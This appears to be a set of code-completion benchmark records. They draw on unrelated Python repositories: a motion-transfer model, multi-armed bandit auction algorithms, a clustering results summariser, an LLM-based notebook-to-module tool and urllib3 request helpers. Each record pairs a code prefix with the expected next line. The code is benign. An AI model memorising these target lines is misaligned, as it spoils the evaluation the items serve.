target_image = target_image.clone()
target_image[:,:3] = self.rgb2ycbcr(target_image[:,:3])
source_image_code,_,_ = self.create_code(source_image,source_heatmaps)
target_image_code,target_mean,target_std = self.create_code(target_image,target_heatmaps)
target_image_code = self.create_deformed_source_image(target_image_code,self.sparse_motion)
source_weight = self.weight * 1000
target_weight = (1 - self.weight) * 1000
transformed_image_code = target_image_code.clone()
transformed_image_code[:,:,0]= (source_image_code[:,:,0] * source_weight + target_image_code[:,:,0] * target_weight) / (source_weight + target_weight + 1e-8)
transformed_image = transformed_image_code * target_std + target_mean
return transformed_image
def create_deformed_source_image(self, source_image, sparse_motions):
"""
Eq 7. in the paper \hat{T}_{s<-d}(z)
"""
if len(source_image.shape) == 5:
bs, _,_, h, w = source_image.shape
source_repeat = source_image.clone()
else:
bs, _, h, w = source_image.shape
source_repeat = source_image.unsqueeze(1).unsqueeze(1).repeat(1, self.num_kp + 1, 1, 1, 1, 1)
source_repeat = source_repeat.view(bs * (self.num_kp + 1), -1, h, w)
sparse_motions = sparse_motions.contiguous().view((bs * (self.num_kp + 1), h, w, -1))
sparse_deformed = F.grid_sample(source_repeat, sparse_motions, padding_mode = 'zeros')
sparse_deformed = sparse_deformed.view((bs, self.num_kp + 1 , -1, h, w))
return sparse_deformed
def create_sparse_motions(self, source_image, kp_driving, kp_source):
bs, _, h, w = source_image.shape | identity_grid = make_coordinate_grid((h, w), type=kp_source['value'].type()) | 1 | 2023-12-16 12:49:10+00:00 | 4k |
DURUII/Replica-AUCB | emulator.py | [
{
"identifier": "AUCB",
"path": "algorithms/aucb.py",
"snippet": "class AUCB(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n # β_i(t), count for how many times each arm is selected\n # r̄_i(t),empirical mean reward for each arm\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n def initialize(self):\n \"\"\" Select all arms at the very beginning. \"\"\"\n\n # Mask to select all arms in the first round (ϕ^1 = N, Line 1)\n mask = np.ones(self.N)\n\n # Observe the reward values r^1_i for all arms, just like a God (Line 2)\n omni = self.omniscience()\n\n # Determine the payments for selected arms (p^t_i) assuming maximum cost (c_max) (Line 3)\n p = mask * StrategicArm.c_max\n\n # Update empirical mean reward (r̄_i(t)) and count of selections (β_i(t)) for each arm (Line 4)\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (1 - mask)\n self.beta += mask\n\n # Update total reward (R) (Line 4)\n self.R += np.sum(omni * mask)\n\n # Update budget (B) after payments (Line 4)\n self.B -= np.sum(p)\n\n def run(self):\n # Bids of each arm (b_i)\n b = np.array([arm.b for arm in self.arms])\n\n while True:\n # Increment the round counter (t) (Line 5)\n self.t += 1\n\n # Calculate UCB values for each arm (r̂_i(t-1)) (Equation 8)\n # TODO Review this Equation, because it is incompatible with code in BanditsBook\n u = np.sqrt((self.K + 1) * (np.log(self.t - 1)) / self.beta)\n r_hat = self.r_bar + u\n\n # Sort and select the top K arms based on the rules (Line 7-9)\n criteria, mask = r_hat / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # Compute the payments for each selected arm (p^t_i) (Line 10)\n deno = r_hat[arrange[self.K]] # \\hat{r_i}_{K+1}(t-1)\n p = np.minimum(r_hat / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # If the sum of payments exceeds the budget, terminate (Line 11)\n if np.sum(p) >= self.B:\n break\n\n # Update states with the new rewards obtained (Lines 13-14)\n omni = self.omniscience()\n self.r_bar = (self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N)) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n # Update total reward (R) (Line 14)\n self.R += np.sum(omni * mask)\n\n # Update budget (B) after payments (Line 14)\n self.B -= np.sum(p)\n\n # Return the total reward (R) and rounds (t) after the algorithm terminates.\n return self.R, self.t"
},
{
"identifier": "EpsilonFirst",
"path": "algorithms/eps.py",
"snippet": "class EpsilonFirst(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float, epsilon: float):\n super().__init__(arms, n_arms, n_selected, budget)\n self.eps = epsilon\n\n # average sampling/empirical rewards\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n # placeholder\n self.budget_exploration = None\n self.budget_exploitation = None\n\n def initialize(self) -> None:\n self.budget_exploration = self.B * self.eps\n self.budget_exploitation = self.B - self.budget_exploration\n\n def run(self):\n # exploration\n while True:\n omni = self.omniscience()\n\n # select Phi randomly\n mask = np.zeros(self.N)\n mask[np.random.choice(np.arange(self.N), self.K)] = 1\n\n # payment p\n # FIXME p is not mentioned in this paper\n p = StrategicArm.c_max * mask\n\n # update t, R, B, r_bar, beta\n self.t += 1\n if self.B - sum(p) <= self.budget_exploitation:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n # exploitation\n b = np.array([arm.b for arm in self.arms])\n while True:\n omni = self.omniscience()\n\n # select Phi\n criteria, mask = self.r_bar / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # payment\n deno = self.r_bar[arrange[self.K]]\n p = np.minimum(self.r_bar / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # update\n self.t += 1\n if np.sum(p) >= self.B:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "Opt",
"path": "algorithms/opt.py",
"snippet": "class Opt(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n\n def initialize(self):\n \"\"\" sort N arms in descending order of p.p.r \"\"\"\n self.arms.sort(key=lambda arm: arm.mu / arm.b, reverse=True)\n\n def run(self):\n \"\"\" selects the top K arms according to r/b every round \"\"\"\n b = np.array([arm.b for arm in self.arms])\n\n while True:\n omni = self.omniscience()\n\n # select Phi\n mask = np.zeros(self.N)\n mask[:self.K] = 1\n\n # payment p\n p = b * mask\n\n # update t, R, B\n self.t += 1\n\n if np.sum(p) >= self.B:\n break\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "Separated",
"path": "algorithms/separated.py",
"snippet": "class Separated(BaseAlgorithm):\n def __init__(self, arms: list[StrategicArm], n_arms: int, n_selected: int, budget: float):\n super().__init__(arms, n_arms, n_selected, budget)\n\n\n self.budget_exploration = 0.0\n self.budget_exploitation = 0.0\n\n # average sampling/empirical rewards\n self.beta, self.r_bar = np.zeros(n_arms), np.zeros(n_arms)\n\n def initialize(self) -> None:\n # B_1 in the paper\n self.budget_exploration = (StrategicArm.c_max * self.N * math.log(self.N * self.B)) ** (1 / 3) * self.B ** (\n 2 / 3) / 2 ** (1 / 3)\n\n self.budget_exploitation = self.B - self.budget_exploration\n\n def run(self):\n # exploration\n lo, hi = 0, self.K - 1\n while True:\n omni = self.omniscience()\n\n # select Phi\n mask = np.zeros(self.N)\n if lo < hi:\n mask[lo:hi + 1] = 1\n else:\n mask[:hi + 1] = 1\n mask[lo:] = 1\n\n lo = (lo + self.K) % self.N\n hi = (hi + self.K) % self.N\n\n # payment p\n p = StrategicArm.c_max * mask\n\n # update t, R, B, r_bar, beta\n self.t += 1\n if self.B - sum(p) <= self.budget_exploitation:\n break\n\n self.r_bar = ((self.r_bar * self.beta + omni) / (self.beta + np.ones(self.N))) * mask + self.r_bar * (\n 1 - mask)\n self.beta += mask\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n # exploitation\n b = np.array([arm.b for arm in self.arms])\n while True:\n omni = self.omniscience()\n\n # select Phi\n u = np.sqrt(self.N * StrategicArm.c_max * np.log(self.N * self.B) / 2 * self.budget_exploration)\n r_tilde = self.r_bar + u\n\n criteria, mask = r_tilde / b, np.zeros(self.N)\n arrange = np.argsort(criteria)[::-1]\n mask[arrange[:self.K]] = 1\n\n # payment\n deno = r_tilde[arrange[self.K]]\n p = np.minimum(r_tilde / deno * b[arrange[self.K]], StrategicArm.c_max) * mask\n\n # update t, R, B, regardless of beta and r_bar\n self.t += 1\n if np.sum(p) >= self.B:\n break\n\n self.R += np.sum(omni * mask)\n self.B -= np.sum(p)\n\n return self.R, self.t"
},
{
"identifier": "StrategicArm",
"path": "arms.py",
"snippet": "class StrategicArm(NormalArm):\n c_min, c_max = 0.1, 1\n\n def __init__(self):\n # in the paper, r is expected reward\n r = random.uniform(0.1, 1)\n # to make that sample value is within 0~1 with 97%\n sigma = random.uniform(0, min(r / 3, (1 - r) / 3))\n super().__init__(r, sigma)\n\n # c for cost, b for bid, c_i = b_i according to the theorem 2\n self.c = random.uniform(0.1, 1)\n self.b = self.c"
}
] | from algorithms.aucb import AUCB
from algorithms.eps import EpsilonFirst
from algorithms.opt import Opt
from algorithms.separated import Separated
from arms import StrategicArm
import pickle | 3,027 | """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal':
| """
Author: DURUII
Date: 2023/12/17
Ref:
1. https://github.com/johnmyleswhite/BanditsBook/blob/master/python/testing_framework/tests.py
2. default simulation settings in the paper
"""
class Emulator:
algorithms = ['AUCB', 'optimal', 'separated', '0.1-first', '0.5-first']
def __init__(self, arms: list[StrategicArm] = None, n_arms: int = 60, n_selected: int = 20, budget: float = 5e5):
self.N = n_arms
self.K = n_selected
self.B = budget
self.arms = arms
if arms is None:
self.arms = [StrategicArm() for _ in range(self.N)]
self.name2sol = {}
def build(self):
for algo in Emulator.algorithms:
if algo == 'AUCB':
self.name2sol[algo] = AUCB(self.arms, self.N, self.K, self.B)
elif algo == 'optimal': | self.name2sol[algo] = Opt(self.arms, self.N, self.K, self.B) | 2 | 2023-12-15 18:17:01+00:00 | 4k |
XLearning-SCU/2023-TPAMI-SMILE | _Utils/SummeryCla.py | [
{
"identifier": "DirectoryOperator",
"path": "_Utils/DirectoryOperator.py",
"snippet": "class DirectoryOperator:\r\n def __init__(self, directory: str):\r\n self.directory = directory\r\n\r\n def make_fold(self):\r\n if not TestMode:\r\n # print('mk dir {}'.format(os.path.dirname(self.directory)))\r\n os.makedirs(os.path.dirname(self.directory), exist_ok=True)\r\n\r\n def modification_time(self):\r\n if os.path.exists(self.directory):\r\n return os.path.getmtime(self.directory)\r\n else:\r\n warnings.warn('Time_now is returned since the modification time for non-exist file is not available. File: {}'.format(self.directory))\r\n return time.time()\r"
},
{
"identifier": "visualize_plot",
"path": "_Utils/Visualize.py",
"snippet": "def visualize_plot(x, y, labels=None, show=False, fig_path=None, xlim=None):\r\n # print('ploting')\r\n st = time.time()\r\n plt.figure(figsize=(20, 10))\r\n if labels is None:\r\n labels = ['line{:02d}'.format(i) for i in range(len(x))]\r\n if not show and fig_path is None:\r\n fig_path = '../_fig/fig.jpg'\r\n for xi, yi, label in zip(x, y, labels):\r\n plt.plot(xi, yi, label=label)\r\n plt.legend(prop={'size': 6})\r\n plt.grid()\r\n if xlim is not None:\r\n plt.xlim((0, 600))\r\n\r\n if fig_path is not None:\r\n DirectoryOperator.FoldOperator(directory=fig_path).make_fold()\r\n plt.savefig(fig_path)\r\n if show:\r\n plt.show()\r\n plt.close()\r\n print('{} lines plotted in {} seconds.'.format(len(x), time.time() - st))\r"
}
] | import os
import warnings
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from _Utils.DirectoryOperator import DirectoryOperator
from _Utils.Visualize import visualize_plot
| 1,672 |
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
|
# my_sota_dirs = my_sota_dirs_1027
my_sota_dirs = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1027_ClasGT2'
def get_results_by_dirs(dirs):
df = pd.DataFrame()
if isinstance(dirs, str):
dirs = [dirs]
for rt in np.sort(dirs):
for run_root, dirs, files in os.walk(rt):
if len(run_root) == 0:
continue
if run_root[0] == '/':
run_root = run_root[1:]
res_csv = os.path.join(run_root, 'log/res.csv')
if not os.path.exists(res_csv):
continue
print('handling {}'.format(res_csv))
rs = pd.read_csv(res_csv)
rs.loc[:, 'src'] = run_root
df = pd.concat([df, rs], ignore_index=True)
# df = df.fillna(0)
return df
def get_sota():
co = ['method', 'dataset', 'aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
data = [
['KCCA', 'NoisyMNIST30000', 1, 1, 97.20, 97.18, 97.08],
['MvCLN', 'NoisyMNIST30000', 0.5, 1, 96.19, 96.18, 96.15],
# ['SURE', 'NoisyMNIST30000', 0.5, 0, 93.01, 85.40, 85.92],
# ['SURE', 'NoisyMNIST30000', 0.5, 0.5, 85.04, 67.71, 69.62],
]
df = pd.DataFrame(data, columns=co)
df.loc[:, 'Name'] = ['{}'.format(m) for m in df.loc[:, 'method']]
# df.loc[:, 'Name'] = ['{:.1f}/{:.1f}/{}'.format(a, c, m) for a, c, m in zip(
# df.loc[:, 'aligned_prop'], df.loc[:, 'complete_prop'], df.loc[:, 'method'])]
df.set_index('Name', inplace=True)
return df
def plot():
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1025_BenchSotaCI22'
# rdir = 'D:/VirtualMachine/CheckPoints/MultiClustering/1014/RunSet1019_InCompelet'
# [print(rdir + '/' + it) for it in np.sort(os.listdir(rdir))]
df = get_results_by_dirs(my_sota_dirs)
sota = get_sota()
for wm in ['MNISTUSPS', 'NoisyMNIST30000', '2view-caltech101-8677sample', 'AWA-7view-10158sample',
'cub_googlenet_doc2vec_c10']:
df_draw = df.copy()
filter_dic = {'Epoch': 149, 'dataset': wm}
# filter_dic = {'Epoch': 149}
group_by_list = [
'dataset', 'batch_size',
'aligned_prop', 'complete_prop',
'CodeTest', 'reFill', 'reAlign', 'reAlignK',
]
for k, v in filter_dic.items():
df_draw = df_draw.loc[df_draw.loc[:, k] == v]
if len(group_by_list):
group_by_list2 = []
for gn in group_by_list:
it = df_draw.loc[:, gn]
if it.isna().sum():
it_na = it[- it.isna()]
if len(it_na):
ddt = it_na.iloc[0]
else:
ddt = 0
df_draw.loc[:, gn] = it.fillna(type(ddt)(0))
warnings.warn('Filling nan in {} with {}.'.format(gn, type(ddt)(0)))
if len(np.unique(it.dropna())) + (1 if it.isna().sum() else 0) > 1:
group_by_list2.append(gn)
group_by_list = group_by_list2
print(group_by_list)
dfgd = pd.concat(
[df_draw[df_draw.loc[:, 'Epoch'] == ep].groupby(group_by_list, as_index=False).mean() for
ep in np.unique(df_draw.loc[:, 'Epoch'].values)])
# dfgd[instance_name] = dfgd.index.values
df_draw = dfgd
show_keys = ['aligned_prop', 'complete_prop', 'ClassificationACC0.2', 'ClassificationACC0.5', 'ClassificationACC0.8']
df_draw = df_draw.loc[:, show_keys]
df_draw.loc[:, show_keys[2:]] *= 100
df_draw.loc[:, 'Name'] = 'IMvC'
df_draw.set_index('Name', inplace=True)
df_fusion = sota.loc[sota.loc[:, 'dataset'] == wm]
df_fusion = pd.concat([df_fusion.loc[:, show_keys], df_draw], ignore_index=False)
# df_fusion = df_draw
df_fusion.loc[:, show_keys[2:]] = np.round(df_fusion.loc[:, show_keys[2:]], 2)
df_fusion = df_fusion.sort_values(by=['aligned_prop', 'complete_prop'])
path = 'D:/VirtualMachine/CheckPoints/MultiClustering/Paper/Table1/Cla_{}.csv'.format(wm)
| DirectoryOperator(path).make_fold()
| 0 | 2023-12-21 08:50:36+00:00 | 4k |
Liyulingyue/ModulelyTools | codes/extraction/ModuleTools.py | [
{
"identifier": "parse_ipynb",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def parse_ipynb(file_path):\n \"\"\"\n # 示例:使用函数解析一个ipynb文件\n file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径\n result = parse_ipynb(file_path)\n print(result)\n \"\"\"\n # 读取ipynb文件\n with open(file_path, 'r', encoding='utf-8') as f:\n nb = nbformat.read(f, as_version=4)\n\n # 初始化结果列表\n parsed_cells = []\n\n # 对每一个cell进行处理\n for cell in nb.cells:\n cell_dict = {}\n if cell.cell_type == 'markdown':\n cell_dict['属性'] = 'Markdown'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n elif cell.cell_type == 'code':\n cell_dict['属性'] = 'Code'\n cell_dict['内容'] = cell.source\n cell_dict['输出'] = ''\n else:\n raise ValueError(f\"Unsupported cell type: {cell.cell_type}\")\n parsed_cells.append(cell_dict)\n return parsed_cells"
},
{
"identifier": "get_ipynb_content",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_ipynb_content(parsed_cells):\n ipynb_content = \"\"\n\n for i in range(len(parsed_cells)):\n if parsed_cells[i]['属性'] == \"Code\":\n ipynb_content += f\"[Cell No. {i}]\\n {parsed_cells[i]['内容']}\\n\\n\"\n\n return ipynb_content"
},
{
"identifier": "get_model_list",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def get_model_list(ipynb_content, llm):\n prompt = \\\nf\"\"\" \n我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。\nNoteBook中的代码是{ipynb_content}\nJson返回的内容格式为:\n{str('{')}\n\"模块\":list[dict{str('{')}\"Name\":str, \"Type\":str, \"Introduction\":str{str('}')}]\n{str('}')}\n“模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为\"class\"或\"function\"),模块介绍\n\"\"\"\n json_data = llm.get_llm_json_answer(prompt)\n return json_data[\"模块\"]"
},
{
"identifier": "model_list2python",
"path": "codes/extraction/ipynb/ipynb_analyse.py",
"snippet": "def model_list2python(model_list, ipynb_content, llm):\n py_str = \"\"\n for model_dict in model_list:\n model_name = model_dict[\"Name\"]\n model_type = model_dict[\"Type\"]\n model_intro = model_dict[\"Introduction\"]\n\n prompt = \\\nf\"\"\" \n我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。\n模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。\nJson返回的内容格式为:\n{str('{')}\n\"代码\":multi-lines str\n{str('}')}\n“代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。\n\"\"\"\n\n # model_impl = get_llm_json_answer(prompt)\n try:\n model_impl = llm.get_llm_json_answer(prompt)\n py_str += model_impl[\"代码\"]\n except:\n py_str += f\"# 模块{model_name},类型是{model_type},生成失败\"\n py_str += \"\\n\\n\"\n return py_str"
},
{
"identifier": "extract_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def extract_function_defs(node, function_defs):\n if isinstance(node, ast.FunctionDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)])\n elif isinstance(node, ast.ClassDef):\n function_source = ast.unparse(node)\n function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)])\n else:\n for child in ast.iter_child_nodes(node):\n extract_function_defs(child, function_defs)"
},
{
"identifier": "get_function_defs",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_function_defs(code):\n tree = ast.parse(code)\n function_defs = []\n extract_function_defs(tree, function_defs)\n return function_defs # a list, each element is [define of function/class, docstring]"
},
{
"identifier": "get_intro_of_fun",
"path": "codes/extraction/py/py_analyse.py",
"snippet": "def get_intro_of_fun(fun_str, llm):\n try:\n prompt = f\"\"\"\n 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。\n 需要解读的函数或者类是{fun_str}\n Json返回的内容格式为:\n {str('{')}\"\n \"说明介绍\":str\n {str('}')}\n \"\"\"\n result = llm.get_llm_answer(prompt)\n try:\n json_dict = llm.extract_json_from_llm_answer(result)\n return json_dict[\"说明介绍\"]\n except:\n return result\n except:\n return \"输出失败\""
}
] | from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python
from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun
from ..llm.Ernie import Ernie
from ..llm.Ernie import Ernie | 1,672 |
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
|
class ModuleTools(object):
def __init__(self, llm_type="Ernie"):
super.__init__()
if llm_type=="Ernie":
self.llm = Ernie()
else: # default set ernie as used llm
self.llm = Ernie()
def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
ipynb_content = get_ipynb_content(result)
model_list = get_model_list(ipynb_content, self.llm)
py_str = model_list2python(model_list, ipynb_content, self.llm)
return py_str
def py2md(self, py_path = "example.py", prompt = ""):
with open(py_path, encoding="utf8") as f:
py_str = f.read()
md_str = "# 函数使用说明文档"
| function_defs = get_function_defs(py_str) | 5 | 2023-12-17 14:20:45+00:00 | 4k |
Azure-Samples/functions-python-web-crawler | .venv/Lib/site-packages/urllib3/util/request.py | [
{
"identifier": "UnrewindableBodyError",
"path": ".venv/Lib/site-packages/urllib3/exceptions.py",
"snippet": "class UnrewindableBodyError(HTTPError):\n \"\"\"urllib3 encountered an error when trying to rewind a body\"\"\""
},
{
"identifier": "to_bytes",
"path": ".venv/Lib/site-packages/urllib3/util/util.py",
"snippet": "def to_bytes(\n x: str | bytes, encoding: str | None = None, errors: str | None = None\n) -> bytes:\n if isinstance(x, bytes):\n return x\n elif not isinstance(x, str):\n raise TypeError(f\"not expecting type {type(x).__name__}\")\n if encoding or errors:\n return x.encode(encoding or \"utf-8\", errors=errors or \"strict\")\n return x.encode()"
}
] | import io
import typing
import brotlicffi as _unused_module_brotli # type: ignore[import] # noqa: F401
import brotli as _unused_module_brotli # type: ignore[import] # noqa: F401
import zstandard as _unused_module_zstd # type: ignore[import] # noqa: F401
from base64 import b64encode
from enum import Enum
from ..exceptions import UnrewindableBodyError
from .util import to_bytes
from typing import Final | 1,772 |
print(urllib3.util.make_headers(keep_alive=True, user_agent="Batman/1.0"))
# {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
print(urllib3.util.make_headers(accept_encoding=True))
# {'accept-encoding': 'gzip,deflate'}
"""
headers: dict[str, str] = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ",".join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers["accept-encoding"] = accept_encoding
if user_agent:
headers["user-agent"] = user_agent
if keep_alive:
headers["connection"] = "keep-alive"
if basic_auth:
headers[
"authorization"
] = f"Basic {b64encode(basic_auth.encode('latin-1')).decode()}"
if proxy_basic_auth:
headers[
"proxy-authorization"
] = f"Basic {b64encode(proxy_basic_auth.encode('latin-1')).decode()}"
if disable_cache:
headers["cache-control"] = "no-cache"
return headers
def set_file_position(
body: typing.Any, pos: _TYPE_BODY_POSITION | None
) -> _TYPE_BODY_POSITION | None:
"""
If a position is provided, move file to that point.
Otherwise, we'll attempt to record a position for future use.
"""
if pos is not None:
rewind_body(body, pos)
elif getattr(body, "tell", None) is not None:
try:
pos = body.tell()
except OSError:
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body.
pos = _FAILEDTELL
return pos
def rewind_body(body: typing.IO[typing.AnyStr], body_pos: _TYPE_BODY_POSITION) -> None:
"""
Attempt to rewind body to a certain position.
Primarily used for request redirects and retries.
:param body:
File-like object that supports seek.
:param int pos:
Position to seek to in file.
"""
body_seek = getattr(body, "seek", None)
if body_seek is not None and isinstance(body_pos, int):
try:
body_seek(body_pos)
except OSError as e:
raise UnrewindableBodyError(
"An error occurred when rewinding request body for redirect/retry."
) from e
elif body_pos is _FAILEDTELL:
raise UnrewindableBodyError(
"Unable to record file position for rewinding "
"request body during a redirect/retry."
)
else:
raise ValueError(
f"body_pos must be of type integer, instead it was {type(body_pos)}."
)
class ChunksAndContentLength(typing.NamedTuple):
chunks: typing.Iterable[bytes] | None
content_length: int | None
def body_to_chunks(
body: typing.Any | None, method: str, blocksize: int
) -> ChunksAndContentLength:
"""Takes the HTTP request method, body, and blocksize and
transforms them into an iterable of chunks to pass to
socket.sendall() and an optional 'Content-Length' header.
A 'Content-Length' of 'None' indicates the length of the body
can't be determined so should use 'Transfer-Encoding: chunked'
for framing instead.
"""
chunks: typing.Iterable[bytes] | None
content_length: int | None
# No body, we need to make a recommendation on 'Content-Length'
# based on whether that request method is expected to have
# a body or not.
if body is None:
chunks = None
